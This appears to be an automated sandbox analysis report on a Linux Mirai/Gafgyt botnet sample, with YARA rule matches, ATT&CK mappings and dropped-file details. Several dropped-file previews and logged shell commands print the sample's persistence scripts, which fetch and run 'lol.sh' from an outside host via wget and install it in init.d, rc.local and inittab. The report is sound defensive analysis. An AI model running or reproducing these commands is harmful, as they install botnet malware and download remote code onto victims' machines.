      Source: 6351.1.0000000000400000.0000000000413000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Mirai_e0cf29e2 os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Mirai, fingerprint = 3f124c3c9f124264dfbbcca1e4b4d7cfcf3274170d4bf8966b6559045873948f, id = e0cf29e2-88d7-4aa4-b60a-c24626f2b246, last_modified = 2021-09-16
      Source: 6311.1.0000000000400000.0000000000413000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Gafgyt_9e9530a7 reference_sample = 01da73e0d425b4d97c5ad75c49657f95618b394d09bd6be644eb968a3b894961, os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Gafgyt, fingerprint = d6ad6512051e87c8c35dc168d82edd071b122d026dce21d39b9782b3d6a01e50, id = 9e9530a7-ad4d-4a44-b764-437b7621052f, last_modified = 2021-09-16
      Source: 6311.1.0000000000400000.0000000000413000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Gafgyt_807911a2 os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Gafgyt, fingerprint = f409037091b7372f5a42bbe437316bd11c655e7a5fe1fcf83d1981cb5c4a389f, id = 807911a2-f6ec-4e65-924f-61cb065dafc6, last_modified = 2021-09-16
      Source: 6311.1.0000000000400000.0000000000413000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Gafgyt_d4227dbf reference_sample = 01da73e0d425b4d97c5ad75c49657f95618b394d09bd6be644eb968a3b894961, os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Gafgyt, fingerprint = 58c4b1d4d167876b64cfa10f609911a80284180e4db093917fea16fae8ccd4e3, id = d4227dbf-6ab4-4637-a6ba-0e604acaafb4, last_modified = 2021-09-16
      Source: 6311.1.0000000000400000.0000000000413000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Gafgyt_d996d335 reference_sample = b511eacd4b44744c8cf82d1b4a9bc6f1022fe6be7c5d17356b171f727ddc6eda, os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Gafgyt, fingerprint = e9ccb8412f32187c309b0e9afcc3a6da21ad2f1ffa251c27f9f720ccb284e3ac, id = d996d335-e049-4052-bf36-6cd07c911a8b, last_modified = 2021-09-16
      Source: 6311.1.0000000000400000.0000000000413000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Gafgyt_620087b9 reference_sample = 01da73e0d425b4d97c5ad75c49657f95618b394d09bd6be644eb968a3b894961, os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Gafgyt, fingerprint = 06cd7e6eb62352ec2ccb9ed48e58c0583c02fefd137cd048d053ab30b5330307, id = 620087b9-c87d-4752-89e8-ca1c16486b28, last_modified = 2021-09-16
      Source: 6311.1.0000000000400000.0000000000413000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Gafgyt_33b4111a reference_sample = 01da73e0d425b4d97c5ad75c49657f95618b394d09bd6be644eb968a3b894961, os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Gafgyt, fingerprint = 9c3b63b9a0f54006bae12abcefdb518904a85f78be573f0780f0a265b12d2d6e, id = 33b4111a-e59e-48db-9d74-34ca44fcd9f5, last_modified = 2021-09-16
      Source: 6311.1.0000000000400000.0000000000413000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Mirai_520deeb8 os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Mirai, fingerprint = f4dfd1d76e07ff875eedfe0ef4f861bee1e4d8e66d68385f602f29cc35e30cca, id = 520deeb8-cbc0-4225-8d23-adba5e040471, last_modified = 2021-09-16
      Source: 6311.1.0000000000400000.0000000000413000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Mirai_01e4a728 os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Mirai, fingerprint = d90477364982bdc6cd22079c245d866454475749f762620273091f2fab73c196, id = 01e4a728-7c1c-479b-aed0-cb76d64dbb02, last_modified = 2021-09-16
      Source: 6311.1.0000000000400000.0000000000413000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Mirai_e0cf29e2 os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Mirai, fingerprint = 3f124c3c9f124264dfbbcca1e4b4d7cfcf3274170d4bf8966b6559045873948f, id = e0cf29e2-88d7-4aa4-b60a-c24626f2b246, last_modified = 2021-09-16
      Source: 6292.1.0000000000400000.0000000000413000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Gafgyt_9e9530a7 reference_sample = 01da73e0d425b4d97c5ad75c49657f95618b394d09bd6be644eb968a3b894961, os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Gafgyt, fingerprint = d6ad6512051e87c8c35dc168d82edd071b122d026dce21d39b9782b3d6a01e50, id = 9e9530a7-ad4d-4a44-b764-437b7621052f, last_modified = 2021-09-16
      Source: 6292.1.0000000000400000.0000000000413000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Gafgyt_807911a2 os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Gafgyt, fingerprint = f409037091b7372f5a42bbe437316bd11c655e7a5fe1fcf83d1981cb5c4a389f, id = 807911a2-f6ec-4e65-924f-61cb065dafc6, last_modified = 2021-09-16
      Source: 6292.1.0000000000400000.0000000000413000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Gafgyt_d4227dbf reference_sample = 01da73e0d425b4d97c5ad75c49657f95618b394d09bd6be644eb968a3b894961, os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Gafgyt, fingerprint = 58c4b1d4d167876b64cfa10f609911a80284180e4db093917fea16fae8ccd4e3, id = d4227dbf-6ab4-4637-a6ba-0e604acaafb4, last_modified = 2021-09-16
Source: 6292.1.0000000000400000.0000000000413000.r-x.sdmp, type: MEMORY; matched rules: Linux_Trojan_Gafgyt_d996d335, Linux_Trojan_Gafgyt_620087b9, Linux_Trojan_Gafgyt_33b4111a, Linux_Trojan_Mirai_520deeb8, Linux_Trojan_Mirai_01e4a728, Linux_Trojan_Mirai_e0cf29e2
Source: 6291.1.0000000000400000.0000000000413000.r-x.sdmp, type: MEMORY; matched rules: Linux_Trojan_Gafgyt_9e9530a7, Linux_Trojan_Gafgyt_807911a2, Linux_Trojan_Gafgyt_d4227dbf, Linux_Trojan_Gafgyt_d996d335, Linux_Trojan_Gafgyt_620087b9, Linux_Trojan_Gafgyt_33b4111a, Linux_Trojan_Mirai_520deeb8, Linux_Trojan_Mirai_01e4a728, Linux_Trojan_Mirai_e0cf29e2
Source: 6346.1.0000000000400000.0000000000413000.r-x.sdmp, type: MEMORY; matched rules: Linux_Trojan_Gafgyt_9e9530a7, Linux_Trojan_Gafgyt_807911a2, Linux_Trojan_Gafgyt_d4227dbf, Linux_Trojan_Gafgyt_d996d335, Linux_Trojan_Gafgyt_620087b9, Linux_Trojan_Gafgyt_33b4111a, Linux_Trojan_Mirai_520deeb8, Linux_Trojan_Mirai_01e4a728, Linux_Trojan_Mirai_e0cf29e2
Source: 6347.1.0000000000400000.0000000000413000.r-x.sdmp, type: MEMORY; matched rules: Linux_Trojan_Gafgyt_9e9530a7, Linux_Trojan_Gafgyt_807911a2, Linux_Trojan_Gafgyt_d4227dbf, Linux_Trojan_Gafgyt_d996d335, Linux_Trojan_Gafgyt_620087b9, Linux_Trojan_Gafgyt_33b4111a, Linux_Trojan_Mirai_520deeb8, Linux_Trojan_Mirai_01e4a728, Linux_Trojan_Mirai_e0cf29e2
Rule metadata (identical for every match listed above; all nine rules share os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, last_modified = 2021-09-16):
Linux_Trojan_Gafgyt_9e9530a7: threat_name = Linux.Trojan.Gafgyt, reference_sample = 01da73e0d425b4d97c5ad75c49657f95618b394d09bd6be644eb968a3b894961, fingerprint = d6ad6512051e87c8c35dc168d82edd071b122d026dce21d39b9782b3d6a01e50, id = 9e9530a7-ad4d-4a44-b764-437b7621052f
Linux_Trojan_Gafgyt_807911a2: threat_name = Linux.Trojan.Gafgyt, fingerprint = f409037091b7372f5a42bbe437316bd11c655e7a5fe1fcf83d1981cb5c4a389f, id = 807911a2-f6ec-4e65-924f-61cb065dafc6
Linux_Trojan_Gafgyt_d4227dbf: threat_name = Linux.Trojan.Gafgyt, reference_sample = 01da73e0d425b4d97c5ad75c49657f95618b394d09bd6be644eb968a3b894961, fingerprint = 58c4b1d4d167876b64cfa10f609911a80284180e4db093917fea16fae8ccd4e3, id = d4227dbf-6ab4-4637-a6ba-0e604acaafb4
Linux_Trojan_Gafgyt_d996d335: threat_name = Linux.Trojan.Gafgyt, reference_sample = b511eacd4b44744c8cf82d1b4a9bc6f1022fe6be7c5d17356b171f727ddc6eda, fingerprint = e9ccb8412f32187c309b0e9afcc3a6da21ad2f1ffa251c27f9f720ccb284e3ac, id = d996d335-e049-4052-bf36-6cd07c911a8b
Linux_Trojan_Gafgyt_620087b9: threat_name = Linux.Trojan.Gafgyt, reference_sample = 01da73e0d425b4d97c5ad75c49657f95618b394d09bd6be644eb968a3b894961, fingerprint = 06cd7e6eb62352ec2ccb9ed48e58c0583c02fefd137cd048d053ab30b5330307, id = 620087b9-c87d-4752-89e8-ca1c16486b28
Linux_Trojan_Gafgyt_33b4111a: threat_name = Linux.Trojan.Gafgyt, reference_sample = 01da73e0d425b4d97c5ad75c49657f95618b394d09bd6be644eb968a3b894961, fingerprint = 9c3b63b9a0f54006bae12abcefdb518904a85f78be573f0780f0a265b12d2d6e, id = 33b4111a-e59e-48db-9d74-34ca44fcd9f5
Linux_Trojan_Mirai_520deeb8: threat_name = Linux.Trojan.Mirai, fingerprint = f4dfd1d76e07ff875eedfe0ef4f861bee1e4d8e66d68385f602f29cc35e30cca, id = 520deeb8-cbc0-4225-8d23-adba5e040471
Linux_Trojan_Mirai_01e4a728: threat_name = Linux.Trojan.Mirai, fingerprint = d90477364982bdc6cd22079c245d866454475749f762620273091f2fab73c196, id = 01e4a728-7c1c-479b-aed0-cb76d64dbb02
Linux_Trojan_Mirai_e0cf29e2: threat_name = Linux.Trojan.Mirai, fingerprint = 3f124c3c9f124264dfbbcca1e4b4d7cfcf3274170d4bf8966b6559045873948f, id = e0cf29e2-88d7-4aa4-b60a-c24626f2b246
Source: classification engine, Classification label: mal92.spre.troj.evad.linELF@0/9@0/0

      Persistence and Installation Behavior

Source: /tmp/x86_64.nn.elf (PID: 6211) File: /etc/profile
Source: /tmp/x86_64.nn.elf (PID: 6211) File: /etc/rc.local
Source: /usr/bin/ln (PID: 6240) File: /etc/rcS.d/S99mybinary -> /etc/init.d/mybinary
Source: /usr/bin/ln (PID: 6247) File: /etc/rc.d/S99x86_64.nn.elf -> /etc/init.d/x86_64.nn.elf
Source: /tmp/x86_64.nn.elf (PID: 6211) File: /etc/rc.local (bits: - usr: rx grp: rx all: rwx)
Source: /usr/bin/chmod (PID: 6234) File: /etc/init.d/mybinary (bits: - usr: rx grp: rx all: rwx)
Source: /usr/bin/chmod (PID: 6243) File: /etc/init.d/x86_64.nn.elf (bits: - usr: rx grp: rx all: rwx)
Source: /tmp/x86_64.nn.elf (PID: 6213) Shell command executed: sh -c "systemctl enable custom.service >/dev/null 2>&1"
Source: /tmp/x86_64.nn.elf (PID: 6233) Shell command executed: sh -c "chmod +x /etc/init.d/mybinary >/dev/null 2>&1"
Source: /tmp/x86_64.nn.elf (PID: 6239) Shell command executed: sh -c "ln -s /etc/init.d/mybinary /etc/rcS.d/S99mybinary >/dev/null 2>&1"
Source: /tmp/x86_64.nn.elf (PID: 6241) Shell command executed: sh -c "echo \"#!/bin/sh\n# /etc/init.d/x86_64.nn.elf\n\ncase \\\"$1\\\" in\n start)\n echo 'Starting x86_64.nn.elf'\n /tmp/x86_64.nn.elf &\n wget http://pen.gorillafirewall.su/ -O /tmp/lol.sh\n chmod +x /tmp/lol.sh\n /tmp/lol.sh &\n ;;\n stop)\n echo 'Stopping x86_64.nn.elf'\n killall x86_64.nn.elf\n ;;\n restart)\n $0 stop\n $0 start\n ;;\n *)\n echo \\\"Usage: $0 {start|stop|restart}\\\"\n exit 1\n ;;\nesac\nexit 0\" > /etc/init.d/x86_64.nn.elf"
Source: /tmp/x86_64.nn.elf (PID: 6242) Shell command executed: sh -c "chmod +x /etc/init.d/x86_64.nn.elf >/dev/null 2>&1"
Source: /tmp/x86_64.nn.elf (PID: 6244) Shell command executed: sh -c "mkdir -p /etc/rc.d >/dev/null 2>&1"
Source: /tmp/x86_64.nn.elf (PID: 6246) Shell command executed: sh -c "ln -s /etc/init.d/x86_64.nn.elf /etc/rc.d/S99x86_64.nn.elf >/dev/null 2>&1"
Source: /bin/sh (PID: 6234) Chmod executable: /usr/bin/chmod -> chmod +x /etc/init.d/mybinary
Source: /bin/sh (PID: 6243) Chmod executable: /usr/bin/chmod -> chmod +x /etc/init.d/x86_64.nn.elf
Source: /bin/sh (PID: 6245) Mkdir executable: /usr/bin/mkdir -> mkdir -p /etc/rc.d
Source: /bin/sh (PID: 6214) Systemctl executable: /usr/bin/systemctl -> systemctl enable custom.service
Source: /tmp/x86_64.nn.elf (PID: 6211) Writes shell script file to disk with an unusual file extension: /etc/init.d/mybinary
Source: /tmp/x86_64.nn.elf (PID: 6211) Writes shell script file to disk with an unusual file extension: /etc/rc.local
Source: /bin/sh (PID: 6241) Writes shell script file to disk with an unusual file extension: /etc/init.d/x86_64.nn.elf

      Hooking and other Techniques for Hiding and Protection

Source: /tmp/x86_64.nn.elf (PID: 6211) File: /etc/init.d/mybinary
Source: /bin/sh (PID: 6241) File: /etc/init.d/x86_64.nn.elf
Source: /tmp/x86_64.nn.elf (PID: 6290) Sleeps longer than 60s: 120.0s
Source: /tmp/x86_64.nn.elf (PID: 6292) Sleeps longer than 60s: 60.0s
Source: /tmp/x86_64.nn.elf (PID: 6301) Sleeps longer than 60s: 250.0s
Source: /tmp/x86_64.nn.elf (PID: 6311) Sleeps longer than 60s: 120.0s
Source: /tmp/x86_64.nn.elf (PID: 6327) Sleeps longer than 60s: 120.0s
Source: /tmp/x86_64.nn.elf (PID: 6352) Sleeps longer than 60s: 60.0s

      Stealing of Sensitive Information

Source: Yara match, File source: x86_64.nn.elf, type: SAMPLE
Source: Yara match, File source: 6211.1.0000000000400000.0000000000413000.r-x.sdmp, type: MEMORY
Source: Yara match, File source: 6290.1.0000000000400000.0000000000413000.r-x.sdmp, type: MEMORY
Source: Yara match, File source: 6289.1.0000000000400000.0000000000413000.r-x.sdmp, type: MEMORY
Source: Yara match, File source: 6352.1.0000000000400000.0000000000413000.r-x.sdmp, type: MEMORY
Source: Yara match, File source: 6310.1.0000000000400000.0000000000413000.r-x.sdmp, type: MEMORY
Source: Yara match, File source: 6351.1.0000000000400000.0000000000413000.r-x.sdmp, type: MEMORY
Source: Yara match, File source: 6311.1.0000000000400000.0000000000413000.r-x.sdmp, type: MEMORY
Source: Yara match, File source: 6292.1.0000000000400000.0000000000413000.r-x.sdmp, type: MEMORY
Source: Yara match, File source: 6291.1.0000000000400000.0000000000413000.r-x.sdmp, type: MEMORY
Source: Yara match, File source: 6346.1.0000000000400000.0000000000413000.r-x.sdmp, type: MEMORY
Source: Yara match, File source: 6347.1.0000000000400000.0000000000413000.r-x.sdmp, type: MEMORY
Source: Yara match, File source: Process Memory Space: x86_64.nn.elf PID: 6211, type: MEMORYSTR
Source: Yara match, File source: Process Memory Space: x86_64.nn.elf PID: 6289, type: MEMORYSTR
Source: Yara match, File source: Process Memory Space: x86_64.nn.elf PID: 6290, type: MEMORYSTR
Source: Yara match, File source: Process Memory Space: x86_64.nn.elf PID: 6291, type: MEMORYSTR
Source: Yara match, File source: Process Memory Space: x86_64.nn.elf PID: 6292, type: MEMORYSTR
Source: Yara match, File source: Process Memory Space: x86_64.nn.elf PID: 6310, type: MEMORYSTR
Source: Yara match, File source: Process Memory Space: x86_64.nn.elf PID: 6311, type: MEMORYSTR
Source: Yara match, File source: Process Memory Space: x86_64.nn.elf PID: 6346, type: MEMORYSTR
Source: Yara match, File source: Process Memory Space: x86_64.nn.elf PID: 6347, type: MEMORYSTR
Source: Yara match, File source: Process Memory Space: x86_64.nn.elf PID: 6351, type: MEMORYSTR
Source: Yara match, File source: Process Memory Space: x86_64.nn.elf PID: 6352, type: MEMORYSTR

      Remote Access Functionality

Source: Yara match, File source: x86_64.nn.elf, type: SAMPLE
Source: Yara match, File source: 6211.1.0000000000400000.0000000000413000.r-x.sdmp, type: MEMORY
Source: Yara match, File source: 6290.1.0000000000400000.0000000000413000.r-x.sdmp, type: MEMORY
Source: Yara match, File source: 6289.1.0000000000400000.0000000000413000.r-x.sdmp, type: MEMORY
Source: Yara match, File source: 6352.1.0000000000400000.0000000000413000.r-x.sdmp, type: MEMORY
Source: Yara match, File source: 6310.1.0000000000400000.0000000000413000.r-x.sdmp, type: MEMORY
Source: Yara match, File source: 6351.1.0000000000400000.0000000000413000.r-x.sdmp, type: MEMORY
Source: Yara match, File source: 6311.1.0000000000400000.0000000000413000.r-x.sdmp, type: MEMORY
Source: Yara match, File source: 6292.1.0000000000400000.0000000000413000.r-x.sdmp, type: MEMORY
Source: Yara match, File source: 6291.1.0000000000400000.0000000000413000.r-x.sdmp, type: MEMORY
Source: Yara match, File source: 6346.1.0000000000400000.0000000000413000.r-x.sdmp, type: MEMORY
Source: Yara match, File source: 6347.1.0000000000400000.0000000000413000.r-x.sdmp, type: MEMORY
Source: Yara match, File source: Process Memory Space: x86_64.nn.elf PID: 6211, type: MEMORYSTR
Source: Yara match, File source: Process Memory Space: x86_64.nn.elf PID: 6289, type: MEMORYSTR
Source: Yara match, File source: Process Memory Space: x86_64.nn.elf PID: 6290, type: MEMORYSTR
Source: Yara match, File source: Process Memory Space: x86_64.nn.elf PID: 6291, type: MEMORYSTR
Source: Yara match, File source: Process Memory Space: x86_64.nn.elf PID: 6292, type: MEMORYSTR
Source: Yara match, File source: Process Memory Space: x86_64.nn.elf PID: 6310, type: MEMORYSTR
Source: Yara match, File source: Process Memory Space: x86_64.nn.elf PID: 6311, type: MEMORYSTR
Source: Yara match, File source: Process Memory Space: x86_64.nn.elf PID: 6346, type: MEMORYSTR
Source: Yara match, File source: Process Memory Space: x86_64.nn.elf PID: 6347, type: MEMORYSTR
Source: Yara match, File source: Process Memory Space: x86_64.nn.elf PID: 6351, type: MEMORYSTR
Source: Yara match, File source: Process Memory Space: x86_64.nn.elf PID: 6352, type: MEMORYSTR
MITRE ATT&CK Matrix, listed per tactic (a leading number is the count of signatures matched for that technique; entries without a number are unmatched placeholders):
Reconnaissance: Gather Victim Identity Information; Credentials; Email Addresses
Resource Development: 2 Scripting; Domains; DNS Server
Initial Access: Valid Accounts; Default Accounts; Domain Accounts
Execution: Windows Management Instrumentation; Scheduled Task/Job; At
Persistence: 1 Unix Shell Configuration Modification; 1 Systemd Service; 2 Scripting
Privilege Escalation: 1 Unix Shell Configuration Modification; 1 Systemd Service; Logon Script (Windows)
Defense Evasion: 1 Masquerading; 1 Virtualization/Sandbox Evasion; 2 File and Directory Permissions Modification
Credential Access: OS Credential Dumping; LSASS Memory; Security Account Manager
Discovery: 1 Virtualization/Sandbox Evasion; Application Window Discovery; Query Registry
Lateral Movement: Remote Services; Remote Desktop Protocol; SMB/Windows Admin Shares
Collection: Data from Local System; Data from Removable Media; Data from Network Shared Drive
Command and Control: Data Obfuscation; Junk Data; Steganography
Exfiltration: Exfiltration Over Other Network Medium; Exfiltration Over Bluetooth; Automated Exfiltration
Impact: 1 Data Manipulation; 1 Service Stop; Data Encrypted for Impact
      No configs have been found
Behavior Graph ID: 1520518, Sample: x86_64.nn.elf, Startdate: 27/09/2024, Architecture: LINUX, Score: 92 (rendered process graph omitted)
Antivirus detection (Source; Detection; Scanner; Label):
x86_64.nn.elf; 37%; ReversingLabs; Linux.Backdoor.Mirai
x86_64.nn.elf; 100%; Avira; EXP/ELF.Mirai.W
Antivirus detection (Source; Detection; Scanner; Label):
/etc/rc.local; 0%; ReversingLabs
No Antivirus matches
No Antivirus matches
      No contacted domains info
URLs (Name; Source; Malicious; Antivirus Detection; Reputation):
http://pen.gorillafirewall.su/lol.sh; x86_64.nn.elf, 6211.1.00007ffd4fb07000.00007ffd4fb28000.rw-.sdmp; false; none; unknown
http://pen.gorillafirewall.su/; x86_64.nn.elf, 6352.1.00007ffd4fb07000.00007ffd4fb28000.rw-.sdmp, profile.12.dr, inittab.12.dr, x86_64.nn.elf.34.dr, bootcmd.12.dr, mybinary.12.dr, custom.service.12.dr; false; none; unknown
          No contacted IP infos
          No context
          No context
          No context
          No context
Dropped file context (Match: Associated Sample Name / URL; Detection; Threat Name):
/etc/init.d/x86_64.nn.elf: x86_64.nn.elf; malicious; Mirai, Okiru
/etc/init.d/mybinary: x86_64.nn.elf; malicious; Mirai, Okiru
/etc/rc.local: x86_64.nn.elf; malicious; Mirai, Okiru
  fAeSHbjY6q.elf; malicious; Mirai, Okiru
  xi12G4nDgf.elf; malicious; Mirai, Okiru
  cieweWkUr2.elf; malicious; Mirai, Okiru
  vCM6VboRal.elf; malicious; Mirai, Okiru
  tVdq8lEt3e.elf; malicious; Mirai, Okiru
  GTWXkCrjA1.elf; malicious; Mirai, Okiru
  jMMTZcFBa8.elf; malicious; Mirai, Okiru
  7MxrefODr5.elf; malicious; Mirai, Okiru
  pO9NAGXywW.elf; malicious; Mirai, Okiru
Process: /tmp/x86_64.nn.elf
File Type: ASCII text
Category: dropped
Size (bytes): 130
Entropy (8bit): 4.6557897642432335
Encrypted: false
SSDEEP: 3:KPJRXfVNFDDoCQALjWQegRILbaaFOdFXa5O:WJRtXforwFCbaaeXCO
MD5: C43AF51A730177D5BE97893495E9C56E
SHA1: 2CF3CE48EBCD44E8F40BAE4EC9AF2F38EFEAE253
SHA-256: F87A5DFC4CBB84E295E6239D2207A21B53681EE9CA225DC3CE54F8D23BE6D86A
SHA-512: E18AAA3206F4780DA8DBCC7E848FCF0D918A895F4F9B89EBED36DEC82586B90DFA17E465F958C0B46A99B524CC6504E8F14429E69798A2A972F3BC1A96D62840
Malicious: false
Reputation: low
Preview: run bootcmd_mmc0; /tmp/x86_64.nn.elf && wget http://pen.gorillafirewall.su/ -O /tmp/lol.sh && chmod +x /tmp/lol.sh && /tmp/lol.sh.

Process: /tmp/x86_64.nn.elf
File Type: POSIX shell script, ASCII text executable
Category: dropped
Size (bytes): 117
Entropy (8bit): 4.653895344261878
Encrypted: false
SSDEEP: 3:TKH4vZKfVNFDvSDRFbALjWQegRILpaKB0dFLoKE0:h8tXzSXbwFCzBeLXE0
MD5: FC98AE985142E9D860067130B0A6C0BA
SHA1: A74297F4B49100CFD2118F7DD7BBC7C7EAF5C343
SHA-256: F8827A346B4040C954E21EBAFB0E39F74DEE1B60348F367745C9251A726D46C3
SHA-512: 217D795AA84763FB7E53F3BDB4A2A78C93C62EEC8DF1B575EAB10EA0D7AE988BBE2710F3E9E30A87F4A498B22AD8628B637524648359F81F54C9EE75CD77EAC1
Malicious: true
Reputation: low
Preview: #!/bin/sh./tmp/x86_64.nn.elf &.wget http://pen.gorillafirewall.su/ -O /tmp/lol.sh.chmod +x /tmp/lol.sh./tmp/lol.sh &.

Process: /bin/sh
File Type: POSIX shell script, ASCII text executable
Category: dropped
Size (bytes): 418
Entropy (8bit): 4.607619458388583
Encrypted: false
SSDEEP: 12:QRkhTXNxfgUJgjvMYFPuKN+dRRucSOyd3:VIbSYOM3
MD5: B88D577D8BA64636EAA4B85146D2BCE4
SHA1: 715B18797C8EEC1FB4BFF960DB9145AC4584944E
SHA-256: 1FDAED3926CA03F6E2973914FC45A40CF93E7EB57AACBD07AD2172374C28DDD2
SHA-512: 683546A08FD6CCE4FCBD8F1E3F2CDB7B8196F9003368D1A6222EBF4C0FAD05B05F092EB103F0DB7D20DADFC4D5D3D470AAF5205430639E3669CE94BA9040E715
Malicious: true
Reputation: low
Preview: #!/bin/sh.# /etc/init.d/x86_64.nn.elf..case "" in. start). echo 'Starting x86_64.nn.elf'. /tmp/x86_64.nn.elf &. wget http://pen.gorillafirewall.su/ -O /tmp/lol.sh. chmod +x /tmp/lol.sh. /tmp/lol.sh &. ;;. stop). echo 'Stopping x86_64.nn.elf'. killall x86_64.nn.elf. ;;. restart). sh stop. sh start. ;;. *). echo "Usage: sh {start|stop|restart}". exit 1. ;;.esac.exit 0.

Process: /tmp/x86_64.nn.elf
File Type: ASCII text
Category: dropped
Size (bytes): 122
Entropy (8bit): 4.57878375837238
Encrypted: false
SSDEEP: 3:nAWu5JVNFDDoCQALjWQegRILbaaFOdFXa5O:AlXforwFCbaaeXCO
MD5: 691DFDB2AE36E857ECF95A9826EE84FF
SHA1: 41FCC9910C2F8C23CF13713C05879737390182CB
SHA-256: 7638F6E1EE0FA5C5AC4040045B60961BED3F6FA643DD3178DF1FF2FD73195C24
SHA-512: 101EF67984CFA98469E6BD5372B38CBE5070BF800DCF3F6F65C418A60E217C7086C4D491F7629457CC694AA6B7050F38F40BF0877597D60E659E035AEE938225
Malicious: false
Reputation: low
Preview: ::respawn:/tmp/x86_64.nn.elf && wget http://pen.gorillafirewall.su/ -O /tmp/lol.sh && chmod +x /tmp/lol.sh && /tmp/lol.sh.

Process: /tmp/x86_64.nn.elf
File Type: ASCII text
Category: dropped
Size (bytes): 53
Entropy (8bit): 3.871459242626451
Encrypted: false
SSDEEP: 3:yGKtARxFQFrgBJ4BJ+3e:dQ0EcHG2e
MD5: 2BD9B4BE30579E633FC0191AA93DF486
SHA1: 7D63A9BD9662E86666B27C1B50DB8E7370C624FF
SHA-256: 64DC39F3004DC93C9FC4F1467B4807F2D8E3EB0BFA96B15C19CD8E7D6FA77A1D
SHA-512: AE6DD7B39191354CF43CF65E517460D7D4C61B8F5C08E33E6CA3C451DC7CAB4DE89F33934C89396B80F1AADE0A4E2571BD5AE8B76EF80B737D4588703D2814D5
Malicious: false
Reputation: moderate, very likely benign file
Preview: gorilla botnet is on the device ur not a cat go away.

Process: /tmp/x86_64.nn.elf
File Type: ASCII text
Category: dropped
Size (bytes): 113
Entropy (8bit): 4.53639514597302
Encrypted: false
SSDEEP: 3:TgfVNFDvSDRFbALjWQegRILbaaFOdFXa50:TgtXzSXbwFCbaaeXC0
                                  MD5:5105559F960624F72CA3C99DFD37B750
                                  SHA1:7B7A35F2D35C08A5BB3BD28254903717C947DFED
                                  SHA-256:0F0FDA85F400F63860D87D093089C9A10B15AAA0BF607B38D1C7388CA7F4DA0B
                                  SHA-512:BF42ABB735751A9C5C780B675A7301DFCAEE5AA2B99B0B3AD2FD00EAFD5C4A9027AA7251E830E89ADED58E62609EF8406C3B724F0474F28E25C519DF0BAF3345
                                  Malicious:true
                                  Preview:/tmp/x86_64.nn.elf &.wget http://pen.gorillafirewall.su/ -O /tmp/lol.sh && chmod +x /tmp/lol.sh && /tmp/lol.sh &.
                                  Process:/tmp/x86_64.nn.elf
                                  File Type:POSIX shell script, ASCII text executable
                                  Category:dropped
                                  Size (bytes):10
                                  Entropy (8bit):3.121928094887362
                                  Encrypted:false
                                  SSDEEP:3:TKH4vn:hv
                                  MD5:3E2B31C72181B87149FF995E7202C0E3
                                  SHA1:BD971BEC88149956458A10FC9C5ECB3EB99DD452
                                  SHA-256:A8076D3D28D21E02012B20EAF7DBF75409A6277134439025F282E368E3305ABF
                                  SHA-512:543F39AF1AE7A2382ED869CBD1EE1AC598A88EB4E213CD64487C54B5C37722C6207EE6DB4FA7E2ED53064259A44115C6DA7BBC8C068378BB52A25E7088EEEBD6
                                  Malicious:true
                                  Antivirus:
                                  • Antivirus: ReversingLabs, Detection: 0%
                                  Joe Sandbox View:
                                  • Filename: x86_64.nn.elf, Detection: malicious
                                  • Filename: fAeSHbjY6q.elf, Detection: malicious
                                  • Filename: xi12G4nDgf.elf, Detection: malicious
                                  • Filename: cieweWkUr2.elf, Detection: malicious
                                  • Filename: vCM6VboRal.elf, Detection: malicious
                                  • Filename: tVdq8lEt3e.elf, Detection: malicious
                                  • Filename: GTWXkCrjA1.elf, Detection: malicious
                                  • Filename: jMMTZcFBa8.elf, Detection: malicious
                                  • Filename: 7MxrefODr5.elf, Detection: malicious
                                  • Filename: pO9NAGXywW.elf, Detection: malicious
                                  Preview:#!/bin/sh.
                                  Process:/tmp/x86_64.nn.elf
                                  File Type:ASCII text
                                  Category:dropped
                                  Size (bytes):311
                                  Entropy (8bit):4.972041660197135
                                  Encrypted:false
                                  SSDEEP:6:z8ifitRZAMzdK+5902+GWRd4wm+GWRo3UN2+GWRuLYACGX9LQmWA4Rv:zNitRZAOK+jp+GWRddm+GWRXY+GWRuL6
                                  MD5:7EAD9B688BCB031A399760E2DF6B684C
                                  SHA1:363C6C4AC23B0F0EC2ABD8C62F25BF6DBD170726
                                  SHA-256:0454F305C7C20E99329EB961C1E232D84111056A9F6A176508176076A5DAB6D2
                                  SHA-512:A63973B96C25F50632DBB9CA5365CBD7B425081FC27421E72946CA3C303121927C843B06900F1D64027E62313DBE86E9876B777EFD51BAF6228239E2DE73B456
